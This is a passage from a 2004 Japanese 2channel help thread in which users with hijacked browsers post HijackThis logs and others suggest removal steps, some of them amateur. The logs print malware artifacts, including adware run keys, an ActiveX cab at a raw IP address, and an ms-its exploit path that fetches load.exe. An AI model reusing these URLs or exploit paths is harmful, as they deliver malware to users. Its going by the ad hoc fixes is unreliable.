いつの間にかお気に入りに入ってきます。

ツールでインターネットオプションを開くとホームページのあどれすが、ヤフーから
見たことのないアドレスになっています。ヤフーに書き換えてもいつの間にか
またちがうあどれすになります。どうしたらいんでしょうか?助けてください。

302 :ひよこ名無しさん:04/05/20 04:33 ID:???
>>301
糞して寝ろヴォケ

303 :ひよこ名無しさん:04/05/20 04:33 ID:PLVj/qpL
>>301
取りあえず>>3の応急処置を行ってみて下さい。

304 :ひよこ名無しさん:04/05/20 04:36 ID:iGfL7swQ
302
なんでそんなこというんですか?
ぼけじゃないです。

305 :ひよこ名無しさん:04/05/20 04:36 ID:Desq4xGm
エロサイトを見ていたら何故か
『teenzzzz』とかいうショートカットがデスクトップに作成されてしまいました。
ショートカットを削除しようとしたのですが、アンインストールしてください的な
メッセージが出たので、それをアンインストールしようとしたのですが、
何故かそのプログラムが見つかりません。
どうしたらいいのかわかりません、助けてください…。


306 :272:04/05/20 04:41 ID:vNg4hALN

Logfile of HijackThis v1.97.7
Scan saved at 4:33:08, on 2004/05/20
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Analog Devices\SoundMAX\Smtray.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\necmfk\necmfk.exe
C:\Program Files\LiquidView\lviewj.exe
C:\Program Files\NEC\Tglclick\tglclick.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe


307 :272:04/05/20 04:43 ID:vNg4hALN
C:\Program Files\Apoint2K\Apoint.exe
C:\WINDOWS\AGRSMMSG.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\D-Tools\daemon.exe
C:\Program Files\Trend Micro\Virus Buster 2004\pccguide.exe
C:\Program Files\Trend Micro\Virus Buster 2004\PCClient.exe
C:\Program Files\Trend Micro\Virus Buster 2004\TMOAgent.exe
C:\WINDOWS\System32\services\all.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\SmartHobby\PlugIn\Picture\CopyFromDigitalCamera\SearchM.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\WINDOWS\system32\NTMETER.EXE
C:\Smdata\ReadSctService.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\Program Files\Trend Micro\Virus Buster 2004\Tmntsrv.exe
C:\Program Files\Trend Micro\Virus Buster 2004\tmproxy.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\WINDOWS\System32\conime.exe
C:\Program Files\Trend Micro\Virus Buster 2004\PccPfw.exe
C:\WINDOWS\System32\wuauclt.exe
C:\Documents and Settings\○○ ○○\デスクトップ\high\HijackThis.exe

R3 - URLSearchHook: (no name) - _{CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=

308 :272:04/05/20 04:44 ID:vNg4hALN
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [TGL] C:\WINDOWS\tcstart.exe
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [Smapp] C:\Program Files\Analog Devices\SoundMAX\Smtray.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [NECMFK] C:\Program Files\necmfk\necmfk.exe
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe /SYNC
O4 - HKLM\..\Run: [LiquidView] C:\\Program Files\\LiquidView\\lviewj.exe
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [imjpmig] C:\Program Files\Common Files\Microsoft Shared\IME\IMJP\imjpmig.exe /RemAdvDef /AIMEREG /Migration /SetPreload
O4 - HKLM\..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
O4 - HKLM\..\Run: [helper.dll] C:\WINDOWS\system32\rundll32.exe C:\PROGRA~1\3721\helper.dll,Rundll32
O4 - HKLM\..\Run: [cesmain.dll] C:\WINDOWS\system32\rundll32.exe C:\PROGRA~1\3721\Ces\cmail.dll,Rundll32
O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [ATIModeChange] Ati2mdxx.exe

309 :ひよこ名無しさん:04/05/20 04:48 ID:???
>>305
コントロールパネル>追加と削除にアヤシイのはないのかい?

310 :272:04/05/20 04:49 ID:vNg4hALN
HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [DAEMON Tools-1033] "C:\Program Files\D-Tools\daemon.exe" -lang 1033
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Virus Buster 2004\pccguide.exe"
O4 - HKLM\..\Run: [PCClient.exe] "C:\Program Files\Trend Micro\Virus Buster 2004\PCClient.exe"
O4 - HKLM\..\Run: [TM Outbreak Agent] "C:\Program Files\Trend Micro\Virus Buster 2004\TMOAgent.exe" /run
O4 - HKLM\..\Run: [ist service uninstall] C:\WINDOWS\System32\services\all.exe /u
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [SearchM] C:\Program Files\SmartHobby\PlugIn\Picture\CopyFromDigitalCamera\SearchM.exe
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [WNST] C:\WINDOWS\System32\wnsapisv.exe
O4 - Global Startup: NTUSER.DAT
O4 - Global Startup: NTUSER.DAT.LOG
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Net Transportでダウンロード - C:\Program Files\Xi\NetTransport 2\NTAddLink.html
O8 - Extra context menu item: 全てをNet Transportでダウンロード - C:\Program Files\Xi\NetTransport 2\NTAddList.html

311 :272:04/05/20 04:49 ID:vNg4hALN
O9 - Extra button: Short Message (HKLM)
O9 - Extra button: 3721CMail (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Messenger (HKLM)
O16 - DPF: Yahoo! Japan Bloxi - http://yog28.yahoo.co.jp/yog/yj/blm9_x.cab
O16 - DPF: Yahoo! Japan Othello - http://yog23.yahoo.co.jp/yog/yj/rm6_x.cab
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (QuickTime Object) - http://www.apple.com/qtactivex/qtplugin.cab
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://207.188.7.150/05b3abc010e31f917d06/netzip/RdxIE601_ja.cab
O16 - DPF: {62475759-9E84-458E-A1AB-5D2C442ADFDE} - http://a1540.g.akamai.net/7/1540/52/20031010/qtinstall.info.apple.com/abarth/jp/win/QuickTimeInstaller.exe
O16 - DPF: {9EB320CE-BE1D-4304-A081-4B4665414BEF} (MediaTicketsInstaller Control) - http://www.mt-download.com/MediaTicketsInstaller.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37879.0090740741
O16 - DPF: {C2FCEF52-ACE9-11D3-BEBD-00105AA9B6AE} (Symantec RuFSI Registry Information Class) - http://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

312 :272:04/05/20 04:51 ID:vNg4hALN
鑑定人さん、御願いします! m( __ __ )m

313 :ひよこ名無しさん:04/05/20 04:54 ID:???
>>312
ウイルスです。

314 :305:04/05/20 04:55 ID:Desq4xGm
『teenzzzz』というショートカットなのですが、
『123534』をアンインストールしてください。と表示されるのです。
それで『123534』をアンインストールしようとしたのですが、
それが見つかりません。
アヤシイのは今のところ見当たらないです。


315 :ひよこ名無しさん:04/05/20 04:57 ID:???
>>314
気にスンナ、ハゲるぞ。

316 :272:04/05/20 05:00 ID:vNg4hALN
>>313
どれがですか?

317 :301:04/05/20 05:04 ID:iGfL7swQ
応急処置もよくやり方がわかりません。。どうしたらいんでしょうか?
くそ旦那がエロサイト見たからこんなげんしょうがおこるんでしょうか?やっぱみてたんでしょうか?

何で消しても消してもお気に入りに出てくるし。。。

318 :ひよこ名無しさん:04/05/20 05:05 ID:???
>>317
とっとと帰れ根釜

319 :301:04/05/20 05:15 ID:iGfL7swQ
何でそういう子というんですか?ねかまじゃないです!!!!!

320 :ひよこ名無しさん:04/05/20 05:16 ID:???
>>317
くそ旦那がエロサイト見たからこんなげんしょうがおこったのは間違いないですが
応急処置がとれないのならリカバリするしかないですね。

321 :301:04/05/20 05:17 ID:iGfL7swQ
ほんとに困ってるのに女なのにまじでどうしたらいいの?

322 :301:04/05/20 05:18 ID:iGfL7swQ
320さん
リカバリってなんですか?どうやるんですか?

323 :ひよこ名無しさん:04/05/20 05:20 ID:???
>>322
それも分かりませんか・・・
エロ旦那たたき起こして復旧させなはれ。

324 :301:04/05/20 05:27 ID:iGfL7swQ
くそ旦那はらたちます!エロ画像しか能がない旦那!!!
たたき起こしても旦那になおすことできるんでしょうか??

まったくパソコン知らない旦那ですが・・・。わたしもですが・・・。

できればやり方教えていただけませんでしょうか?

325 :ひよこ名無しさん:04/05/20 05:41 ID:???
>>324
まずリカバリをすると今までのデータが消えてしまうので
消えて困るものはCDRや外付けHDDに待避して下さい。
PCの説明書を見るなどして付属品としてリカバリディスクがあるか確認して下さい。
あればリカバリ出来ます。 無かったらここであきらめて下さい。
リカバリディスクがありましたらそれをCDドライブにセットして下さい。
そして再起動して下さい。
詳しくは説明書を見て下さい。機種によりいくらかの違いがありますので。
自己責任でお願いします。

326 :301:04/05/20 05:53 ID:iGfL7swQ
親切に教えていただきありがとうございます。やってみます!!!
ほんとうにありがとうございました。


327 :ひよこ名無しさん:04/05/20 06:26 ID:???
>>326
エロ旦那の肩を持つわけでもないけど
イタズラでスパイウエアのページに誘導するリンクが多数あります
あながちエロページに行ったとも限りません。
家のPCだったのが幸いで会社のPCだとえらいことになります

328 :ひよこ名無しさん:04/05/20 07:04 ID:???
「根釜」みたいなスラングが理解できるようなちゃんねらーなのにこの文章。
なんだか釣り師のにおいがするんだが

329 :ひよこ名無しさん:04/05/20 07:30 ID:???
>>272
とりあえず、HijackThis以外のウィンドウを全て閉じ、
HijackThisから下記エントリを削除後、PCを再起動して下さい。

R3 - URLSearchHook: (no name) - _{CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)

O4 - HKLM\..\Run: [helper.dll] C:\WINDOWS\system32\rundll32.exe C:\PROGRA~1\3721\helper.dll,Rundll32

O4 - HKLM\..\Run: [cesmain.dll] C:\WINDOWS\system32\rundll32.exe C:\PROGRA~1\3721\Ces\cmail.dll,Rundll32

O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot

O4 - HKCU\..\Run: [WNST] C:\WINDOWS\System32\wnsapisv.exe

O9 - Extra button: Short Message (HKLM)

O9 - Extra button: 3721CMail (HKLM)

O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://207.188.7.150/05b3abc010e31f917d06/netzip/RdxIE601_ja.cab

その後WEB設定のリセット

もう一度CoolWebShredderによる自動削除

http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo

330 :272:04/05/20 12:25 ID:vNg4hALN
>>329
直りませんでした。
なんだか申し訳なくなってきました。 

331 :教えてください:04/05/20 14:03 ID:???
Hijackthisをしたのですがどれを削除していいかわかりません・・・。
http://www5f.biglobe.ne.jp/~macchasoko/cgi-bin/apuroda/source/kon4925.jpg


332 :ひよこ名無しさん:04/05/20 14:04 ID:???
>>331
>>284の名前欄から全部読め

333 :ひよこ名無しさん:04/05/20 14:16 ID:???
スレ民:どーしてテンプレを読まないのですか?
質問者:面倒だから
スレ民:……

スレ民:面倒ならPCを窓から投げ捨てろ!悩まなくて済むぞ!!

334 :ひよこ名無しさん:04/05/20 14:38 ID:7/GYdQgf
http://www2.2ch.net/2ch.html
エロサイトではないんですがここの427のURLをクリックしたら
パソコンがばぐりました・・・
HOMEがyahooだったのにエロサイトに変わりyahooに戻しても戻りません。
対処法を教えてください

335 :ひよこ名無しさん:04/05/20 14:39 ID:???
>>334
ネタウザイ

336 :ひよこ名無しさん:04/05/20 15:19 ID:hmBZr1Ag
「自作PCのある部屋をUPするアプロダ」を観覧してたらエロサイトに飛ばされ、
勝手にプログラムがインストールされ、インターネットエクスプローラからネットを開始する度に
エラーが発生し、ランダムでttp://www.39-93.com/?id=cool&c=pMD1n0f18Kf50IHI3iPu3k33RJPAz6n4等(エロサイト注意)
のサイトに飛ばされてしまいます。一応コントローラパネルからの削除を行おうとしたのですが、見つかりませんでした…
どうしたら良いでしょうか。。。

337 :ひよこ名無しさん:04/05/20 15:26 ID:N4jWb5PG
> 前スレの989 さん

職場のPCが壊れたとのヘルプを聞き調べたところ同じ症状でした。
色々と対策を施しましたが、なかなか手ごわい。
ウィルスの検出には引っかからなくなったにもかかわらず、レジストリとIEのホームページ
を何度修復してもjksearch.bizが復活してしまい、打つ手が無くなりこの掲示板に来ましたが、
残念ながらここにも有効な情報が無いことから、最後の手段として以下の手順を踏みました。

1.ローカルドライブから「jksearch.biz」を含むファイルを検索
        →C:\WINNT\SYSTEM32.DLL 削除できず。
2.起動時にF8押下でセーフモード
3.C:\WINNT\SYSTEM32.DLLをSYSTEM32_.DLLにリネーム
4.再起動
5.regeditで「jksearch」を検索し、該当があれば「http://www.google.co.jp/(お好みで)」に変更
6.Web設定のリセット

原因不明ですが、これで回復しました。(汗)
自己責任でお試しください。

338 :ひよこ名無しさん:04/05/20 15:27 ID:wDCVC6Ka
恥ずかしながらエッチなサイトを閲覧してしまい、スパイウェアと思われるものに感染されてしまいました。

その症状としてインターネットを開くとWINDOIWSインストーラが勝手に出てくるのです。
新しい窓を開くたびにでてきて、キャンセルを押しています・・・。

あと画面の下の方に「serchBAR」というバーができてしまいました・・・。
どうにかして消したいんですけどどうしたらよいのでしょうか?

あとパックマンの広告が勝手に出てくるという現象もおきます・・・。

どなたかこの3つの問題の解決策をよろしくお願いいたします。

339 :ひよこ名無しさん:04/05/20 15:29 ID:N4jWb5PG
337です。
上記はC:\WINNT\SYSTEM32\SYSTEM32.DLLの誤りでした。失礼。

340 :ひよこ名無しさん:04/05/20 15:32 ID:???
質問者へ

>1、>284、>333を読め


341 :ひよこ名無しさん:04/05/20 16:00 ID:oOaNRzyE
みなさんと同じような感じなんですが、
Spybotをダウンロードしようと思い、Spybotのページに行こうとすると、
ウインドウが閉じてしまいます。
また「ファイル名を指定して実行」でmsconfigやrejeditと入れても
ウインドウが開きません。
どうすればいいでしょうか。

342 :338:04/05/20 16:02 ID:wDCVC6Ka
メモにとりました。どれを消せばよいでしょうか?
よろしくお願いいたします。
Logfile of HijackThis v1.97.7
Scan saved at 15:59:59, on 2004/05/20
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\Ati2evxx.exe


343 :338:04/05/20 16:04 ID:wDCVC6Ka
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Fujitsu\PCKARTE\PCKTESVC.EXE
C:\Program Files\Fujitsu\sa\api\SBRSVC.EXE
C:\WINDOWS\System32\MsPMSPSv.exe
C:\Program Files\Fujitsu\PowerUtility\schedule\PUSCSRVC.exe
C:\WINDOWS\System32\wuauclt.exe
C:\WINDOWS\LTSMMSG.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\Fujitsu\IndicatorUtility\IndicatorUty.exe
C:\Program Files\Fujitsu\Fujitsu Quick Touch\QuickTouch.exe
C:\Program Files\Fujitsu\BtnHnd\BtnHnd.exe
C:\Program Files\Fujitsu\PowerUtility\schedule\PUSCDaemon.exe
C:\WINDOWS\System32\ezSP_Px.exe
C:\Program Files\Fujitsu\iNetConDsp\iNetConDsp.exe
C:\Program Files\MELCO INC\エアステーションユーティリティ\CLIENTMG\ABReceiver.exe

344 :338:04/05/20 16:05 ID:wDCVC6Ka
C:\PROGRA~1\ACDSYS~1\DEVDET~1\DEVDET~1.EXE
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\ISTsvc\istsvc.exe
C:\Program Files\Internet Optimizer\optimize.exe
C:\program files\180solutions\msbb.exe
C:\Program Files\Save\Save.exe
C:\Program Files\WhenUSearch\Search.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Documents and Settings\Owner\Application Data\utwb.exe
C:\WINDOWS\System32\wnsintsv.exe
C:\Program Files\ClockSync\Sync.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\Program Files\Di\Hatchinn\hatchinn.exe
C:\Program Files\InterVideo\Common\Bin\WinCinemaMgr.exe
C:\Program Files\Fujitsu\sa\bin\mpbtn.exe
C:\WINDOWS\System32\msiexec.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\Owner\デスクトップ\HijackThis\HijackThis.exe


345 :ひよこ名無しさん:04/05/20 16:06 ID:???
>>342
全部消すといいよ。

346 :338:04/05/20 16:06 ID:wDCVC6Ka
R3 - URLSearchHook: (no name) - _{CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O2 - BHO: (no name) - {000020DD-C72E-4113-AF77-DD56626C6C42} - C:\WINDOWS\twaintec.dll
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: IDN Helper Object - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\DOWNLO~1\CNSMIN~1.DLL
O2 - BHO: (no name) - {F7F808F0-6F7D-442C-93E3-4A4827C2E4C8} - C:\WINDOWS\nem216.dll
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: ISTbar - {5F1ABCDB-A875-46c1-8345-B72A4567E486} - C:\Program Files\ISTbar\istbar.dll
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [ATIModeChange] Ati2mdxx.exe
O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [LTSMMSG] LTSMMSG.exe
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [IndicatorUtility] C:\Program Files\Fujitsu\IndicatorUtility\IndicatorUty.exe

347 :338:04/05/20 16:07 ID:wDCVC6Ka
O4 - HKLM\..\Run: [LoadFujitsuQuickTouch] C:\Program Files\Fujitsu\Fujitsu Quick Touch\QuickTouch.exe
O4 - HKLM\..\Run: [LoadBtnHnd] C:\Program Files\Fujitsu\BtnHnd\BtnHnd.exe
O4 - HKLM\..\Run: [LoadPUSCDaemon] C:\Program Files\Fujitsu\PowerUtility\schedule\PUSCDaemon.exe
O4 - HKLM\..\Run: [ezShieldProtector for Px] C:\WINDOWS\System32\ezSP_Px.exe
O4 - HKLM\..\Run: [imjpmig] C:\Program Files\Common Files\Microsoft Shared\IME\IMJP\imjpmig.exe /RemAdvDef /AIMEREG /Migration /SetPreload
O4 - HKLM\..\Run: [INETCONDSP] "C:\Program Files\Fujitsu\iNetConDsp\iNetConDsp.exe"
O4 - HKLM\..\Run: [ABRECEIVER] "C:\Program Files\MELCO INC\
O4 - HKLM\..\Run: [Camera Detector] C:\PROGRA~1\ACDSYS~1\DEVDET~1\DEVDET~1.EXE -autorun
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [IST Service] C:\Program Files\ISTsvc\istsvc.exe
O4 - HKLM\..\Run: [Internet Optimizer] "C:\Program Files\Internet Optimizer\optimize.exe"
O4 - HKLM\..\Run: [msbb] c:\program files\180solutions\msbb.exe
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\WINDOWS\DOWNLO~1\CnsMin.dll,Rundll32
O4 - HKLM\..\Run: [WhenUSave] "C:\Program Files\Save\Save.exe"
O4 - HKLM\..\Run: [WhenUSearch] "C:\Program Files\WhenUSearch\Search.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Tars] C:\Documents and Settings\Owner\Application Data\utwb.exe
O4 - HKCU\..\Run: [WNSC] C:\WINDOWS\System32\wnsintsv.exe
O4 - HKCU\..\Run: [ClockSync] "C:\Program Files\ClockSync\Sync.exe" /q
O4 - Startup: NTUSER.DAT
O4 - Startup: ntuser.dat.LOG

348 :338:04/05/20 16:08 ID:wDCVC6Ka
O4 - Startup: ntuser.ini
O4 - Global Startup: NTUSER.DAT
O4 - Global Startup: NTUSER.DAT.LOG
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O9 - Extra button: Real.com (HKLM)
O11 - Options group: [!CNS] JWord(
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (QuickTime Object) - http://www.apple.com/qtactivex/qtplugin.cab
O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!http://cashsearch.biz/legal/x.chm::/load.exe
O16 - DPF: {41F17733-B041-4099-A042-B518BB6A408C} - http://a1540.g.akamai.net/7/1540/52/20021126/qtinstall.info.apple.com/dribnif/jp/win/QuickTimeInstaller.exe
O16 - DPF: {9EB320CE-BE1D-4304-A081-4B4665414BEF} (MediaTicketsInstaller Control) - http://www.mt-download.com/MediaTicketsInstaller.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?38111.0711342593
O16 - DPF: {E2F2B9D0-96B9-4B25-B90C-636ECB207D18} - http://www.whenusearch.com/WUInstSEWC.cab
O16 - DPF: {EF86873F-04C2-4A95-A373-5703C08EFC7B} (Installer Class) - http://www.xxxtoolbar.com/ist/softwares/v3.0/0006.cab



349 :341:04/05/20 16:09 ID:oOaNRzyE
Ad-Awareはダウンロードして実行しましたが、治りませんでした。

350 :338:04/05/20 16:10 ID:wDCVC6Ka
本当に混乱してて、とてもあせっています。
どなたか、よろしくお願いいたします・・・。

351 :ひよこ名無しさん:04/05/20 16:10 ID:???
>>350
窓の手使え。

352 :ひよこ名無しさん:04/05/20 16:30 ID:+iPZ5CE5
エロサイト見てたわけじゃないんですが、
さっきから急にホームが
ttp://school-fuck.com/
といういかがわしいアドレスがホームになってしまいました。

手動でYahooをホームに設定しなおしても
アドレスが上のものに変わってしまうので
Spybotとad-awereを使い、駆除し、駆除されましたと出て
検索しなおすとHitしなくなるのですが
やはりホームが上のアドレスになってしまいます。
また、IEが5.5だったので6.0SP1にアップグレードしてみましたが
状況は変わりませんでした。

どうしたら元に戻るでしょうか。
アドバイスお願いします。
OSはWinMEです。

353 :ひよこ名無しさん:04/05/20 16:34 ID:???
システムの復元
 システムの復元
  システムの復元
   システムの復元
    システムの復元
 

354 :ひよこ名無しさん:04/05/20 16:36 ID:???
テンプレ読まないバカはOS再インストのほうが楽だぞ

355 :341:04/05/20 16:50 ID:oOaNRzyE
システムの復元って、セーブモードでやらないとダメですか?
セーブモードにできないんですが

356 :ひよこ名無しさん:04/05/20 16:53 ID:???
>>355
御前にPCは無理。ゲームウォッチからやり直せ。

357 :ひよこ名無しさん:04/05/20 16:53 ID:???
>>355
セーブモードなんてない

358 :341:04/05/20 16:54 ID:oOaNRzyE
どなたかマジレスでお願いします。

359 :ひよこ名無しさん:04/05/20 16:58 ID:t+XOUjSy


       / ̄ ̄ ̄ ̄ ̄
       |  寒い!
       \
          ̄∨ ̄ ̄ ̄
                   ∧_∧      / ̄ ̄ ̄ ̄ ̄ ̄
         ∧_∧     ( ´Д`)    <  キモい!
         ( ´Д` )   /⌒    ⌒ヽ    \______
        /,  /   /_/|     へ \
       (ぃ9  |  (ぃ9 ./    /   \ \.∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄
        /    /、    /    ./     ヽ ( ´Д` )<  あり得ない!
       /   ∧_二つ (    /      ∪ ,  /   \_______
       /   /      \ .\\     (ぃ9  |
      /    \       \ .\\    /    /  
     /  /~\ \        >  ) )  ./   ∧_二∃
     /  /   >  )      / //   ./     ̄ ̄ ヽ
   / ノ    / /      / / /  ._/  /~ ̄ ̄/ /
  / /   .  / ./.      / / / )⌒ _ ノ     / ./   
  / ./     ( ヽ、     ( ヽ ヽ | /       ( ヽ、 
(  _)      \__つ    \__つ).し          \__つ 



360 :ひよこ名無しさん:04/05/20 17:11 ID:???
>>358
リカバリ・・・間  違  い  な  い。

361 :ひよこ名無しさん:04/05/20 17:11 ID:???
マジレス
テンプレ読んで実行しろ、話はそれからだ

362 :341:04/05/20 17:26 ID:oOaNRzyE
実行して詰まってるんだよ

363 :ひよこ名無しさん:04/05/20 17:32 ID:???
>>362
http://spybot.dalnet.com.fr/spybotsd13.exe

364 :ひよこ名無しさん:04/05/20 17:34 ID:/zWRGrTK
>>341
まずはウイルススキャンからやってみては?
どうせ、製品版買ってないだろうから、オンラインスキャンやってみなさい。

365 :341:04/05/20 17:40 ID:oOaNRzyE
>>363
ありがとです。
でも、やっぱ無理みたい。
「ファイルをコピーできません。送り側のファイルまたはディスクから読み取れません。」
と出る。
CWシュレッダーも同様。

366 :ひよこ名無しさん:04/05/20 17:42 ID:???
>>365
セーフモードで

367 :ひよこ名無しさん:04/05/20 17:43 ID:???
>>365
名前を変えてダウンロード

368 :ひよこ名無しさん:04/05/20 17:46 ID:???
http://higaitaisaku.web.infoseek.co.jp/removehacdef.html
ここは読んだのか?

369 :341:04/05/20 17:54 ID:oOaNRzyE
システムの復元を試みたんだけど、
「ファイル名を指定して実行」でmsconfigやrejeditと入れても
ウインドウが開かなかったり、瞬時に閉じたりして
セーフモードにできないんですよ。

370 :ひよこ名無しさん:04/05/20 18:03 ID:???
F8押しっぱなしでPC起動、メニューが出てきてセーフモードを選ぶ

371 :341:04/05/20 18:26 ID:oOaNRzyE
>>370
どうもです。
セーフモードになりました。セーフモードにするとネットに接続できないんですね。
今から再びセーフモードにして、システムの復元をやってみます。

